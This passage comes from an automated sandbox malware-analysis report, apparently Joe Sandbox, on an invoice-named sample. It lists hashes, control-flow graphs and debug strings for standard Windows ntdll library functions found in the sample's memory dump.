                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d5185cd41cd9c9fba1a7b750dcc080afeb890ba6b888bd435f911ba8628839b
                                • Instruction ID: 9665186686d7f8c5c831a575548da66a428e12bad2474df562375f3c29cf89b4
                                • Opcode Fuzzy Hash: 0d5185cd41cd9c9fba1a7b750dcc080afeb890ba6b888bd435f911ba8628839b
                                • Instruction Fuzzy Hash: 7390023120240842D10571585508B86015547E0311F59D017E1128614D8615CA557521
                                Function 32522CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 899d85f59f285ede8ef826c0ed0067b39c43f19e35fdd696e2e6fe9be7cfe575
                                • Instruction ID: 7dab44d22f83d7fd1d10301895d01eb5701997132e2d4bfcc9bbe21d9091bbf7
                                • Opcode Fuzzy Hash: 899d85f59f285ede8ef826c0ed0067b39c43f19e35fdd696e2e6fe9be7cfe575
                                • Instruction Fuzzy Hash: 8990022160640402D1457158651C746016547D0211F59E012E1028514DC6598B5976A1
                                Function 32522CF0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b78ceec1825d3ac2b9c19dd179855914f1afcd025933d9c2306e587764825b3a
                                • Instruction ID: cef5cd9667acd41102006cc70c25d27f4263aa8856981dfd1261d2f3cdf33170
                                • Opcode Fuzzy Hash: b78ceec1825d3ac2b9c19dd179855914f1afcd025933d9c2306e587764825b3a
                                • Instruction Fuzzy Hash: 7690023120240403D1057158660C747015547D0211F59E412E1428518DD6568A557121
                                Function 32522CA0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4cb54ea68264474b4bf68e5e4fde9625c8fdb2e03188392193b9bdb97eb3030f
                                • Instruction ID: 32c1940302d5ebf621ddc5423cfbcae06423ccbc5f243b06296bebe162065076
                                • Opcode Fuzzy Hash: 4cb54ea68264474b4bf68e5e4fde9625c8fdb2e03188392193b9bdb97eb3030f
                                • Instruction Fuzzy Hash: C790023120240402D1057598650C786015547E0311F59E012E6028515EC6658A957131
                                Function 32522D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 571370f7462d9140f9acf26cc48bd18395fddc55e9846950ece44baa4e25df9d
                                • Instruction ID: 94b05caff92ea270a5d3f4acbff4b5574525ff3379354016654d8606265e2a22
                                • Opcode Fuzzy Hash: 571370f7462d9140f9acf26cc48bd18395fddc55e9846950ece44baa4e25df9d
                                • Instruction Fuzzy Hash: 7990022921340002D1857158650C74A015547D1212F99E416E1019518CC9158A6D6321
                                Function 32522D00 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90e7c4996557debce2fef6ae9e65d72f2db184fa99b9a550299e8675c4f010fc
                                • Instruction ID: a9f6fa1339b3e468ce8857e374099479cfc7b2e2c68d4eecd91b18e31d3a7f49
                                • Opcode Fuzzy Hash: 90e7c4996557debce2fef6ae9e65d72f2db184fa99b9a550299e8675c4f010fc
                                • Instruction Fuzzy Hash: 2790022120644442D1057558650CB46015547D0215F59E012E2068555DC6358A55B131
                                Function 32522D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d216133f9a809635b78087dc8ed83bb3b687a202290dcdd6d50ebd9f7596016c
                                • Instruction ID: ec5d4a576c961276bb0fe199ba593c89afafb302b133d7208bbe823b256caac5
                                • Opcode Fuzzy Hash: d216133f9a809635b78087dc8ed83bb3b687a202290dcdd6d50ebd9f7596016c
                                • Instruction Fuzzy Hash: 4490022130240003D1457158651C746415597E1311F59E012E1418514CD9158A5A6222
                                Function 32522DD0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ada7b379f27efbdc3f5b3edb479f439f38b87533bd594f48b39792de96d4c46a
                                • Instruction ID: 38b2c8161545218c172b6fc4541c5df13e0033815d9674e091b5edfd0c238cd8
                                • Opcode Fuzzy Hash: ada7b379f27efbdc3f5b3edb479f439f38b87533bd594f48b39792de96d4c46a
                                • Instruction Fuzzy Hash: 9090022124344152554AB1585508647415657E0251799D013E2418910C85269A5AE621
                                Function 32522DB0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 373caa334101c4a6c65a51a7bd8584825ce4ba13f8e2a4fdfd424d8c72668eed
                                • Instruction ID: eccf4ec13e6561bca441c389a59465ce28b76579d87450b8566e2a08bf129588
                                • Opcode Fuzzy Hash: 373caa334101c4a6c65a51a7bd8584825ce4ba13f8e2a4fdfd424d8c72668eed
                                • Instruction Fuzzy Hash: 5490023124240402D14671585508746015957D0251F99D013E1428514E86558B5ABA61
                                Function 32522C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: d6b095ffc2505a062e12a0821b016ca4459385dc2147b0a7676ccd3be70fcbdb
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:
                                Function 32522890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1127 32522890-325228b3 1128 3255a4bc-3255a4c0 1127->1128 1129 325228b9-325228cc 1127->1129 1128->1129 1130 3255a4c6-3255a4ca 1128->1130 1131 325228ce-325228d7 1129->1131 1132 325228dd-325228df 1129->1132 1130->1129 1133 3255a4d0-3255a4d4 1130->1133 1131->1132 1135 3255a57e-3255a585 1131->1135 1134 325228e1-325228e5 1132->1134 1133->1129 1136 3255a4da-3255a4de 1133->1136 1137 325228eb-325228fa 1134->1137 1138 32522988-3252298e 1134->1138 1135->1132 1136->1129 1139 3255a4e4-3255a4eb 1136->1139 1140 32522900-32522905 1137->1140 1141 3255a58a-3255a58d 1137->1141 1142 32522908-3252290c 1138->1142 1143 3255a564-3255a56c 1139->1143 1144 3255a4ed-3255a4f4 1139->1144 1140->1142 1141->1142 1142->1134 1145 3252290e-3252291b 1142->1145 1143->1129 1146 3255a572-3255a576 1143->1146 1147 3255a4f6-3255a4fe 1144->1147 1148 3255a50b 1144->1148 1149 32522921 1145->1149 1150 3255a592-3255a599 1145->1150 1146->1129 1151 3255a57c call 32530050 1146->1151 1147->1129 1152 3255a504-3255a509 1147->1152 1153 3255a510-3255a536 call 32530050 1148->1153 1154 32522924-32522926 1149->1154 1158 3255a5a1-3255a5c9 call 32530050 1150->1158 1169 3255a55d-3255a55f 1151->1169 1152->1153 1153->1169 1155 32522993-32522995 1154->1155 1156 32522928-3252292a 1154->1156 1155->1156 1164 32522997-325229b1 call 32530050 1155->1164 1160 32522946-32522966 call 32530050 1156->1160 1161 3252292c-3252292e 1156->1161 1176 32522969-32522974 1160->1176 1161->1160 1166 32522930-32522944 call 32530050 1161->1166 1164->1176 1166->1160 1172 32522981-32522985 1169->1172 1176->1154 1178 32522976-32522979 1176->1178 1178->1158 1179 3252297f 1178->1179 1179->1172
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                • Instruction ID: c50a918128c767e13321e1902b7853f5b12a2db0fff97560fa129198418de2c2
                                • Opcode Fuzzy Hash: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                • Instruction Fuzzy Hash: 6D510DBAA0031ABFDB14DB58C990A7EFBB8BB483417508169E495D76C1D634DF40CBE0
                                Function 32592410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1180 32592410-32592433 1181 32592439-3259243d 1180->1181 1182 325924ec-325924ff 1180->1182 1181->1182 1183 32592443-32592447 1181->1183 1184 32592501-3259250a 1182->1184 1185 32592513-32592515 1182->1185 1183->1182 1186 3259244d-32592451 1183->1186 1184->1185 1187 3259250c 1184->1187 1188 32592517-3259251b 1185->1188 1186->1182 1189 32592457-3259245b 1186->1189 1187->1185 1190 32592538-3259253e 1188->1190 1191 3259251d-3259252c 1188->1191 1189->1182 1193 32592461-32592468 1189->1193 1192 32592543-32592547 1190->1192 1194 3259252e-32592536 1191->1194 1195 32592540 1191->1195 1192->1188 1196 32592549-32592556 1192->1196 1197 3259246a-32592471 1193->1197 1198 325924b6-325924be 1193->1198 1194->1192 1195->1192 1199 32592558-32592562 1196->1199 1200 32592564 1196->1200 1202 32592473-3259247b 1197->1202 1203 32592484 1197->1203 1198->1182 1201 325924c0-325924c4 1198->1201 1204 32592567-32592569 1199->1204 1200->1204 1201->1182 1205 325924c6-325924ea call 32530510 1201->1205 1202->1182 1206 3259247d-32592482 1202->1206 1207 32592489-325924ab call 32530510 1203->1207 1209 3259256b-3259256d 1204->1209 1210 3259258d-3259258f 1204->1210 1218 325924ae-325924b1 1205->1218 1206->1207 1207->1218 1209->1210 1213 3259256f-3259258b call 32530510 1209->1213 1215 325925ae-325925d0 call 32530510 1210->1215 1216 32592591-32592593 1210->1216 1225 325925d3-325925df 1213->1225 1215->1225 1216->1215 1220 32592595-325925ab call 32530510 1216->1220 1222 32592615-32592619 1218->1222 1220->1215 1225->1204 1227 325925e1-325925e4 1225->1227 1228 32592613 1227->1228 1229 325925e6-32592610 call 32530510 1227->1229 1228->1222 1229->1228
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                • Instruction ID: 1233cc029c4f9659bdfac8d8109b53bf4ba15679653e69201308d06de7ca628f
                                • Opcode Fuzzy Hash: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                • Instruction Fuzzy Hash: 07510775A00745AFEB64CF9DC9A0ABFBBF8EB44240B408859E4D9C7641EA74DF00CB60
                                Function 325BA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1429 325ba670-325ba6e9 call 324f2410 * 2 RtlDebugPrintTimes 1435 325ba89f-325ba8c4 call 324f25b0 * 2 call 32524c30 1429->1435 1436 325ba6ef-325ba6fa 1429->1436 1438 325ba6fc-325ba709 1436->1438 1439 325ba724 1436->1439 1441 325ba70b-325ba70d 1438->1441 1442 325ba70f-325ba715 1438->1442 1443 325ba728-325ba734 1439->1443 1441->1442 1445 325ba71b-325ba722 1442->1445 1446 325ba7f3-325ba7f5 1442->1446 1447 325ba741-325ba743 1443->1447 1445->1443 1448 325ba81f-325ba821 1446->1448 1449 325ba736-325ba73c 1447->1449 1450 325ba745-325ba747 1447->1450 1452 325ba827-325ba834 1448->1452 1453 325ba755-325ba77d RtlDebugPrintTimes 1448->1453 1455 325ba73e 1449->1455 1456 325ba74c-325ba750 1449->1456 1450->1448 1458 325ba85a-325ba866 1452->1458 1459 325ba836-325ba843 1452->1459 1453->1435 1467 325ba783-325ba7a0 RtlDebugPrintTimes 1453->1467 1455->1447 1457 325ba86c-325ba86e 1456->1457 1457->1448 1464 325ba87b-325ba87d 1458->1464 1462 325ba84b-325ba851 1459->1462 1463 325ba845-325ba849 1459->1463 1468 325ba96b-325ba96d 1462->1468 1469 325ba857 1462->1469 1463->1462 1465 325ba87f-325ba881 1464->1465 1466 325ba870-325ba876 1464->1466 1470 325ba883-325ba889 1465->1470 1471 325ba878 1466->1471 1472 325ba8c7-325ba8cb 1466->1472 1467->1435 1477 325ba7a6-325ba7cc RtlDebugPrintTimes 1467->1477 1468->1470 1469->1458 1473 325ba88b-325ba89d RtlDebugPrintTimes 1470->1473 1474 325ba8d0-325ba8f4 RtlDebugPrintTimes 1470->1474 1471->1464 1476 325ba99f-325ba9a1 1472->1476 1473->1435 1474->1435 1480 325ba8f6-325ba913 RtlDebugPrintTimes 1474->1480 1477->1435 1482 325ba7d2-325ba7d4 1477->1482 1480->1435 1487 325ba915-325ba944 RtlDebugPrintTimes 1480->1487 1484 325ba7f7-325ba80a 1482->1484 1485 325ba7d6-325ba7e3 1482->1485 1486 325ba817-325ba819 1484->1486 1488 325ba7eb-325ba7f1 1485->1488 1489 325ba7e5-325ba7e9 1485->1489 1490 325ba81b-325ba81d 1486->1490 1491 325ba80c-325ba812 1486->1491 1487->1435 1495 325ba94a-325ba94c 1487->1495 1488->1446 1488->1484 1489->1488 1490->1448 1492 325ba868-325ba86a 1491->1492 1493 325ba814 1491->1493 1492->1457 1493->1486 1496 325ba94e-325ba95b 1495->1496 1497 325ba972-325ba985 1495->1497 1498 325ba95d-325ba961 1496->1498 1499 325ba963-325ba969 1496->1499 1500 325ba992-325ba994 1497->1500 1498->1499 1499->1468 1499->1497 1501 325ba987-325ba98d 1500->1501 1502 325ba996 1500->1502 1503 325ba99b-325ba99d 1501->1503 1504 325ba98f 1501->1504 1502->1465 1503->1476 1504->1500
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP:
                                • API String ID: 3446177414-2466845122
                                • Opcode ID: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                • Instruction ID: da99b4e9906c892a1c20617c40ae66832d86acd404f951d90935fc0ca6079673
                                • Opcode Fuzzy Hash: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                • Instruction Fuzzy Hash: 18A18C75A043128FDB09CE28C890A1ABBE5FF88364F15496DF945DB350EB70EE46CB91
                                Function 32517630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1505 32517630-32517651 1506 32517653-3251766f call 324ee660 1505->1506 1507 3251768b-32517699 call 32524c30 1505->1507 1512 32517675-32517682 1506->1512 1513 32554638 1506->1513 1514 32517684 1512->1514 1515 3251769a-325176a9 call 32517818 1512->1515 1517 3255463f-32554645 1513->1517 1514->1507 1521 32517701-3251770a 1515->1521 1522 325176ab-325176c1 call 325177cd 1515->1522 1519 325176c7-325176d0 call 32517728 1517->1519 1520 3255464b-325546b8 call 3256f290 call 32529020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1521 1530 325176d2 1519->1530 1520->1519 1540 325546be-325546c6 1520->1540 1525 325176d8-325176e1 1521->1525 1522->1517 1522->1519 1532 325176e3-325176f2 call 3251771b 1525->1532 1533 3251770c-3251770e 1525->1533 1530->1525 1534 325176f4-325176f6 1532->1534 1533->1534 1538 32517710-32517719 1534->1538 1539 325176f8-325176fa 1534->1539 1538->1539 1539->1514 1542 325176fc 1539->1542 1540->1519 1541 325546cc-325546d3 1540->1541 1541->1519 1543 325546d9-325546e4 1541->1543 1544 325547be-325547d0 call 32522c50 1542->1544 1545 325547b9 call 32524d48 1543->1545 1546 325546ea-32554723 call 3256f290 call 3252aaa0 1543->1546 1544->1514 1545->1544 1554 32554725-32554736 call 3256f290 1546->1554 1555 3255473b-3255476b call 3256f290 1546->1555 1554->1521 1555->1519 1560 32554771-3255477f call 3252a770 1555->1560 1563 32554786-325547a3 call 3256f290 call 3255cf9e 1560->1563 1564 32554781-32554783 1560->1564 1563->1519 1569 325547a9-325547b2 1563->1569 1564->1563 1569->1560 1570 325547b4 1569->1570 1570->1519
                                Strings
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32554725
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32554742
                                • Execute=1, xrefs: 32554713
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 32554787
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32554655
                                • ExecuteOptions, xrefs: 325546A0
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 325546FC
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                • Instruction ID: f3cd50072f883d1e07f7b1a0bf0fa70fc144bf248fd799e80da5987c6082a94a
                                • Opcode Fuzzy Hash: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                • Instruction Fuzzy Hash: 3F510575A00319BBFF109EA9DC95FAE77B8AF44345F9004A9E505AB1C0EB70AB45CF50
                                Function 324FA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                Download Yara Rule
                                Strings
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 325479D0, 325479F5
                                • SsHd, xrefs: 324FA3E4
                                • Actx , xrefs: 32547A0C, 32547A73
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479FA
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479D5
                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32547AE6
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                • API String ID: 0-1988757188
                                • Opcode ID: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                • Instruction ID: 4f47f1dc22d9bfe622660885045ab9ca558715f101fa73b1cc3ecf24ade3b3e7
                                • Opcode Fuzzy Hash: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                • Instruction Fuzzy Hash: E9E1C174604352AFE714CE25C884B5AB7E1AFC4B58F504A2EEC95CB390DF32DA85CB91
                                Function 3255FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                • API String ID: 3446177414-4227709934
                                • Opcode ID: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                • Instruction ID: f651a2156da0423dbd7e831563c0df0f17b6582deb731a4441ee70c8feee0883
